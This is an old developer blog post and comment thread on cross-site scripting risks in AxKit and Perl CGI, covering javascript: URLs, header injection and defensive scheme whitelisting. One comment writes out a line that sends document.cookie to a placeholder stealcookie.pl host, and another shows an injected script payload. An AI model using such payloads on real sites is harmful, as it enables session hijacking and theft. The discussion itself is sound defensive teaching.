Reason for AxKit

Matts on 2003-01-24T10:12:50

I keep forgetting to mention this, but I want to make sure I write it down *somewhere*...

One of the best reasons for developing a site in AxKit XSP is that it totally eradicates XSS bugs. No need to check what you output - it doesn't matter - there's no way to bypass the strict output checking that XML gives you.

This is all TRACE notwithstanding ;-)

The other thing I found out about TRACE is that it totally bypasses any Apache handler installed (mod_perl or otherwise). This seems like a bug to me - if I could handle TRACE in AxKit I could disable it very easily. Bah.


I hate to be pessimistic but ...

IlyaM on 2003-01-25T13:06:53

Do I get it right that with AxKit it is impossible to inject new tags into the output? If yes, then it makes creating XSS holes much harder but not impossible, because XSS is not just injection of dangerous tags into the output. Imagine, for example, a public web service that lets people exchange URLs (let's call it "Shared bookmarks"). An obvious possible XSS hole is not verifying that the scheme part of a submitted URL is free of dangerous schemes like 'javascript'. I doubt AxKit can automatically protect from this kind of programming error.
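For instance (a sketch of the problem in plain Perl, not AxKit XSP code): the malicious value contains no markup at all, so XML-level output escaping has nothing to reject.

# The stored "bookmark" is attacker-controlled, but it contains no angle
# brackets, so output escaping passes it straight through.
my $bookmark = 'javascript:alert(document.cookie)';

# The generated markup is perfectly well-formed and yet still dangerous:
#   <a href="javascript:alert(document.cookie)">my link</a>
print qq{<a href="$bookmark">my link</a>\n};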

Re:I hate to be pessimistic but ...

Matts on 2003-01-25T17:57:11

You're absolutely right, and I'm no security expert, so just how much damage can you do with the javascript: scheme? Is it limited to one function call, or can you chain lots of javascript into one method?

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-25T20:52:52

At least with Mozilla you can chain several function calls. BTW there are other types of XSS attacks which, as I understand it, AxKit cannot protect from, like arbitrary user input passed into response HTTP headers.

Re:I hate to be pessimistic but ...

Matts on 2003-01-25T21:21:44

arbitrary user input passed into response HTTP headers.

Mind explaining how this works? I still don't know enough about XSS, but it's a technique that has fascinated me ever since I watched Jeffrey Baker demo it at the Open Source Conference 2.5 years ago.

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-26T09:12:47

Take this Perl CGI for example:

use CGI;

my $cgi = CGI->new;

# print headers
print "Content-type: text/html\n";
print "Set-Cookie: cookie=" . $cgi->param('cookie') . "\n";
print "\n";

# print content
print "<html>.....</html>";
An attacker can pass as the value of the "cookie" parameter something like "\n\n<script>....</script>", so this CGI ends up printing:
Content-type: text/html
Set-Cookie: cookie=

<script>...</script>

<html>.....</html>
See? Since arbitrary user input is allowed in the headers, the attacker can actually pass bad HTML into the content body. Though in the mod_perl world you would use Apache's API to output HTTP headers, and I'm not sure it would work there (it may not pass "\n" through - I never tested it).
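A minimal defence here, in the same plain-CGI style (a sketch only; the helper name is just for illustration, not an existing module), is to strip CR/LF from anything user-supplied before it goes into a header:

use CGI;

my $cgi = CGI->new;

# Hypothetical helper: remove CR and LF so user input cannot terminate
# the header block and inject content into the response body.
sub sanitize_header_value {
    my ($value) = @_;
    $value = '' unless defined $value;
    $value =~ s/[\r\n]//g;
    return $value;
}

print "Content-type: text/html\n";
print "Set-Cookie: cookie=" . sanitize_header_value($cgi->param('cookie')) . "\n";
print "\n";
print "<html>.....</html>";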

Re:I hate to be pessimistic but ...

Matts on 2003-01-26T10:17:54

That's not possible with AxKit. You can only add headers with $r->headers_out->add() or the Cookie taglib (which uses headers_out underneath). Creating cookies with the cookie taglib automatically encodes and decodes them.

Re:I hate to be pessimistic but ...

Matts on 2003-01-26T10:40:25

Ah, wait a minute. $r->headers_out->add() is vulnerable to this problem.

Most interesting.
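For what it's worth, the same strip-before-output idea in mod_perl 1.x terms - a sketch only, assuming $r is the Apache request object in a handler and that Apache::Request is available for parameter parsing; I haven't tested this against AxKit's taglibs:

use Apache::Request;

# Pull the user-supplied value, then remove CR/LF so a crafted parameter
# cannot split the response headers via headers_out->add().
my $apr    = Apache::Request->new($r);
my $cookie = $apr->param('cookie');
$cookie = '' unless defined $cookie;
$cookie =~ s/[\r\n]//g;
$r->headers_out->add('Set-Cookie' => "cookie=$cookie");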

Re:I hate to be pessimistic but ...

darobin on 2003-01-27T11:51:52

I don't think it's limited to one call, but even if it is you always have Good Ol' eval() there, so it doesn't make much of a difference, I'm afraid.

Re:I hate to be pessimistic but ...

Matts on 2003-01-27T12:26:59

OK, so given any link you have to check that it starts with /^(https?|ftp):/. Sounds fairly straightforward (though I don't think I do any checking in the AxKit wiki).

Still, I think overall that means you've got a lot less coding to do with AxKit than with other (inferior ;-) solutions.
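A minimal sketch of that whitelist check (the function name is just illustrative, not an AxKit API):

# Accept a link only if it uses an explicitly allowed scheme.
sub is_safe_link {
    my ($url) = @_;
    return $url =~ /^(?:https?|ftp):/i;
}

# Usage:
print is_safe_link('http://axkit.org/')                 ? "ok\n" : "rejected\n";
print is_safe_link('javascript:alert(document.cookie)') ? "ok\n" : "rejected\n";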

Re:I hate to be pessimistic but ...

darobin on 2003-01-27T13:39:10

AxKit has the advantage re XSS that it will be more likely to blow up given some treacherous charset than other solutions will be, especially if you convert charsets from UTF-8 to Latin-X at the end. Apart from that, it's probably just as open as anything that deals with user-provided content.

I'm not sure there's much to protecting the Wiki. A Wiki is, by definition, well, XSS-enabled :) It pretty much works based on trusting other people. At any rate, if you want to protect against javascript: URLs, I'd check on !/^\s*javascript\s*:/i rather than on positive matches. It's less secure, but I see more and more people using other "weirder" schemes such as nntp, tel, irc, telnet, etc... But that's just my €0.02.

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-28T09:31:44

I'm not sure there's much to protecting the Wiki

Very, very, very wrong. The security model of client-side scripting is that there is a single trust zone per hostname. If you have, say, a properly coded e-commerce shop and a wiki with XSS bugs sitting on the same domain, then the e-commerce shop is also vulnerable. The attacker only needs to lure an e-commerce shop user onto the part of the wiki with the XSS bug and, bummer, the user's auth cookie is known to the "bad" guy.

Re:I hate to be pessimistic but ...

darobin on 2003-01-28T09:53:06

Oh yeah, that I know. I was thinking about axkit.org. And I must say I haven't seen many Wikis that were on the same domain as an e-commerce site; it would be quite dangerous imho. There are so many ways to get JS code to run (URL, cookie-munging, on* event handlers, redirects, script elements...).

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-28T10:12:53

I'd explicitly list "good" schemes and reject all others. Various browsers used to support various dangerous schemes in addition to javascript. For example, I recall some versions of MSIE had a bug which allowed running javascript via the about: scheme.

Re:I hate to be pessimistic but ...

darobin on 2003-01-28T11:10:06

Depends on what kind of security you want. For axkit.org's Wiki I'd allow everything, including javascript:, so that we can have bookmarklets in there. For a site that has sensitive information I wouldn't use a Wiki.

Re:I hate to be pessimistic but ...

Matts on 2003-01-28T11:58:48

Too late. Pod::SAX now explicitly only allows (https?|ftp|mailto|s?news|nntp).

Javascript is just too dangerous.

There are probably still bugs in the wiki in that it allows XML input, so you may be able to sneak something by that way, but hopefully the XSLT should disallow anything but known tags (and filter attributes sanely).

Re:I hate to be pessimistic but ...

pudge on 2003-01-31T15:37:56

I forget the exact code, but you can do something like javascript:document.open("http://www.example.com/stealcookie.pl?cookie=" + document.cookie). You really need to explicitly check for JavaScript, which also means checking for derivatives like ecmascript:, as well as all the URL-encoded forms (encoding into %xx). IIRC, we URI-unescape it in Slash, then check the scheme against /script$/.
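A rough sketch of that decode-then-check idea (just an illustration, not the actual Slash code):

use URI::Escape qw(uri_unescape);

# Reject a URL if, after undoing %xx encoding, its scheme ends in "script"
# (javascript:, ecmascript:, vbscript:, ...).
sub looks_like_script_url {
    my ($url) = @_;
    my $decoded = uri_unescape($url);
    if ($decoded =~ /^\s*([a-z][a-z0-9+.-]*)\s*:/i) {
        return 1 if lc($1) =~ /script$/;
    }
    return 0;
}

# Usage:
print looks_like_script_url('java%73cript:alert(1)') ? "blocked\n" : "ok\n";
print looks_like_script_url('http://example.com/')   ? "blocked\n" : "ok\n";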

Re:I hate to be pessimistic but ...

Matts on 2003-01-31T16:40:38

Wouldn't it be better to do the "firewall" approach and only allow certain schemes rather than block others?

Re:I hate to be pessimistic but ...

pudge on 2003-01-31T16:52:56

It depends on what you want to do, but perhaps. Slash does this now, only allowing a small set of schemes. But we still have the code excluding javascript: schemes specifically.